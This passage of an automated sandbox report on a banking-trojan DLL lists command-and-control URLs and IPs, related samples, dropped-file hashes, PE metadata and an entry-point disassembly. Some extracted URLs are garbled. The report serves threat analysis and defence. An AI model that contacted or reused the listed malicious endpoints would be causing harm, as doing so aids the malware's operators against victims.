                      https://192.46.210.220/7.0.96:6891/Microsoftrundll32.exe, 00000003.00000003.582189208.000000000508F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://143.244.140.214:808/lrundll32.exe, 00000003.00000003.818278271.0000000003004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45.77.0.96/rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/gzrundll32.exe, 00000003.00000003.818278271.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/_Brundll32.exe, 00000003.00000003.542639549.000000000508F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/graphyrundll32.exe, 00000003.00000003.725673411.0000000005090000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.870520545.000000000508C000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://143.244.140.214:808/rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://45192.46.210.220/rundll32.exe, 00000003.00000003.565283775.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      https://45.77.0.96:6891/rundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://192.46.210.220/1-rundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/9Crundll32.exe, 00000003.00000003.557024904.000000000508F000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://45.77.0.96:6891/rrundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpfalse
                        unknown
                        https://143.244.140.214:808/oftrundll32.exe, 00000003.00000003.717236230.0000000003004000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://45.77.0.96:6891/7Crundll32.exe, 00000003.00000003.557024904.000000000508F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/h.dllrundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/mCrundll32.exe, 00000003.00000003.671006878.000000000508F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/ll1rundll32.exe, 00000003.00000003.619902609.0000000003004000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/563209-4053062332-1002?rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/lmrundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://143.244.140.214:808/llrundll32.exe, 00000003.00000003.690035042.0000000003004000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://45.77.0.96:6891/dCrundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://192.46.210.220/irundll32.exe, 00000003.00000003.801279123.0000000003004000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpfalse
                          unknown
                          https://45.77.0.96:6891/ICrundll32.exe, 00000003.00000003.582189208.000000000508F000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://182.46.210.220/rundll32.exe, 00000003.00000003.556993945.0000000003004000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://192.46.210.220/(rundll32.exe, 00000003.00000003.681709088.0000000003004000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://192.46.210.220/ographyrundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://192.46.210.220/=-rundll32.exe, 00000003.00000003.603018518.0000000003004000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://185.56.219.47:8116/softrundll32.exe, 00000003.00000003.628258081.0000000003004000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://192.46.210.220/9-rundll32.exe, 00000003.00000003.784548798.0000000003004000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://192.46.210.220/GlobalSignrundll32.exe, 00000003.00000002.870117440.0000000003068000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://45.77.0.96:6891/Microsoftrundll32.exe, 00000003.00000003.565314349.000000000508F000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.582189208.000000000508F000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://192.46.210.220/prundll32.exe, 00000003.00000003.522212080.0000000003004000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown

                          Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public

                          IPDomainCountryFlagASNASN NameMalicious
                          45.77.0.96
                          unknownUnited States
                          20473AS-CHOOPAUStrue
                          185.56.219.47
                          unknownItaly
                          202675KELIWEBITtrue
                          192.46.210.220
                          unknownUnited States
                          5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGetrue
                          143.244.140.214
                          unknownUnited States
                          174COGENT-174UStrue

                          Private

                          IP
                          192.168.2.1

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:510697
                          Start date:28.10.2021
                          Start time:05:06:22
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 11m 5s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:SecuriteInfo.com.Variant.Razy.980776.23616.12095 (renamed file extension from 12095 to dll)
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:24
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal84.bank.troj.evad.winDLL@11/2@0/5
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 14% (good quality ratio 14%)
                          • Quality average: 79.2%
                          • Quality standard deviation: 15.8%
                          HCA Information:
                          • Successful, ratio: 71%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Override analysis time to 240s for rundll32
                          Warnings:
                          Show All
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                          • TCP Packets have been reduced to 100
                          • Excluded IPs from analysis (whitelisted): 23.211.6.115, 173.222.108.210, 173.222.108.226, 20.82.210.154, 23.211.4.86, 20.50.102.62, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60
                          • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtEnumerateKey calls found.
                          • Report size getting too big, too many NtEnumerateValueKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          05:08:25API Interceptor176x Sleep call for process: rundll32.exe modified
                          05:08:26API Interceptor180x Sleep call for process: loaddll32.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          45.77.0.96SecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                            SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                              SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                  SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                    SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                      SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                        SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                            SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                              SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                  SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                    SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                      SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                        SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                            SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                              SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                  185.56.219.47SecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                              SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                  SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                    SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                      SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                        SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                            SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                              SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                  SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                    SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                      SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                        SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse

                                                                                                          Domains

                                                                                                          No context

                                                                                                          ASN

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          KELIWEBITSecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                          • 185.56.219.47
                                                                                                          AS-CHOOPAUSSecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                          • 45.77.0.96

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                          51c64c77e60f3980eea90869b68c58a8SecuriteInfo.com.Variant.Razy.980776.19527.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.5008.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.19803.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.31954.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10558.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.8232.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.30568.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.9478.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28061.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.25006.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.28328.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.4470.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.14159.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.20807.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.27063.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2260.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.12452.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.6851.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.2379.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220
                                                                                                          SecuriteInfo.com.Variant.Razy.980776.10617.dllGet hashmaliciousBrowse
                                                                                                          • 192.46.210.220

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                          Category:dropped
                                                                                                          Size (bytes):61157
                                                                                                          Entropy (8bit):7.995991509218449
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                          MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                          SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                          SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                          SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview: MSCF............,...................I........t........*S{I .authroot.stl..p.(.5..CK..8U....u.}M7{v!.\D.u.....F.eWI.!e..B2QIR..$4.%.3eK$J. ......9w4...=.9..}...~....$..h..ye.A..;....|. O6.a0xN....9..C..t.z.,..d`.c...(5.....<..1.|..2.1.0.g.4yw..eW.#.x....+.oF....8.t...Y....q.M.....HB.^y^a...)..GaV"|..+.'..f..V.y.b.V.PV......`..9+..\0.g...!.s..a....Q...........~@$.....8..(g..tj....=,V)v.s.d.].xqX4.....s....K..6.tH.....p~.2..!..<./X......r.. ?(.\[. H...#?.H.".. p.V.}.`L...P0.y....|...A..(...&..3.ag...c..7.T=....ip.Ta..F.....'..BsV...0.....f....Lh.f..6....u.....Mqm.,...@.WZ.={,;.J...)...{_Ao....T......xJmH.#..>.f..RQT.Ul(..AV..|.!k0...|\......U2U..........,9..+.\R..(.[.'M........0.o..,.t.#..>y.!....!X<o.....w...'......a.'..og+>..|.s.g.Wr.2K.=...5.YO.E.V.....`.O..[.d.....c..g....A..=....k..u2..Y.}.......C...\=...&...U.e...?...z.'..$..fj.'|.c....4y.".T.....X....@xpQ.,.q.."...t.... $.F..O.A.o_}d.3...z...F?..-...Fy...W#...1......T.3....x.
                                                                                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                          File Type:data
                                                                                                          Category:modified
                                                                                                          Size (bytes):326
                                                                                                          Entropy (8bit):3.0938378947914615
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6:kK84dFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:Uq2kPlE99SNxAhUefit
                                                                                                          MD5:081DFFC35BFEB5F7D16D2ABE8ADF0378
                                                                                                          SHA1:7AB4666E6FC72FB2A2C780CDFCF0C42EECC587EC
                                                                                                          SHA-256:CA21EFF014E099A3E6DA5FF1E66B901E914DC3375B5312AD23F6E53D2090709B
                                                                                                          SHA-512:96E11EF2C79322AC5EBBF246AC40F1DF1A28223BED1D6640052EBB8FB5A1D3CB77F1292B689DC76AD63D5E0F55DD8BC7FA813C903E61598872BDF4F6F8B3468A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview: p...... ........ ......(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.439735541518985
                                                                                                          TrID:
                                                                                                          • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                          • DOS Executable Generic (2002/1) 0.20%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:SecuriteInfo.com.Variant.Razy.980776.23616.dll
                                                                                                          File size:1375232
                                                                                                          MD5:50b17cce4a58067e69bf19e006320ec4
                                                                                                          SHA1:26275bcc652ed3498cf73c771169c3e367fde96c
                                                                                                          SHA256:8a9bb370f658f04ebd313ba3d074e3fe63230f5eb8709ecbb6b92933f35559bd
                                                                                                          SHA512:05635bfeb6623a9a588f5b87b68c21b4e3953ab54a0d7ab396d9a05aef986fd4692ac306063c057b9ec4f4691ce3d14fbb69c63a70cb98d93e98414ac3603609
                                                                                                          SSDEEP:24576:FnxqsL+DvNdnhMr5Lo6dOGcuQNrSH9d6N9eYWtZgDxxxSPnsqz7puATt5csRbu7A:Fcfk82uAJTI7ePswKwuO
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... SGh ... ... ... ...!... ...!... ...!... ...!... SGl ... ... ... ...!m.. ...!... ..c ... ...!... Rich... .......

                                                                                                          File Icon

                                                                                                          Icon Hash:74f0e4ecccdce0e4

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x4336b0
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                          Time Stamp:0x5BBD3C24 [Tue Oct 9 23:39:16 2018 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:6
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:6
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:6
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:ccbe70d6d0d02f6248ca160d6a0bb85b

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          cmp dword ptr [ebp+0Ch], 01h
                                                                                                          jne 00007F29D8A2BA87h
                                                                                                          call 00007F29D8A2C7B7h
                                                                                                          mov eax, dword ptr [ebp+10h]
                                                                                                          push eax
                                                                                                          mov ecx, dword ptr [ebp+0Ch]
                                                                                                          push ecx
                                                                                                          mov edx, dword ptr [ebp+08h]
                                                                                                          push edx
                                                                                                          call 00007F29D8A2B876h
                                                                                                          add esp, 0Ch
                                                                                                          pop ebp
                                                                                                          retn 000Ch
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          mov eax, dword ptr [0054806Ch]
                                                                                                          xor edx, edx
                                                                                                          mov ecx, 00000020h
                                                                                                          div ecx
                                                                                                          push edx
                                                                                                          mov edx, dword ptr [ebp+08h]
                                                                                                          xor edx, dword ptr [0054806Ch]
                                                                                                          push edx
                                                                                                          call 00007F29D8A2BAC4h
                                                                                                          add esp, 08h
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          mov eax, dword ptr [0054806Ch]
                                                                                                          xor edx, edx
                                                                                                          mov ecx, 00000020h
                                                                                                          div ecx
                                                                                                          mov eax, 00000020h
                                                                                                          sub eax, edx
                                                                                                          push eax
                                                                                                          mov ecx, dword ptr [ebp+08h]
                                                                                                          push ecx
                                                                                                          call 00007F29D8A2BA93h
                                                                                                          add esp, 08h
                                                                                                          xor eax, dword ptr [0054806Ch]
                                                                                                          pop ebp
                                                                                                          ret
                                                                                                          int3
                                                                                                          int3
                                                                                                          int3
                                                                                                          push ebp
                                                                                                          mov ebp, esp
                                                                                                          mov eax, dword ptr [ebp+08h]
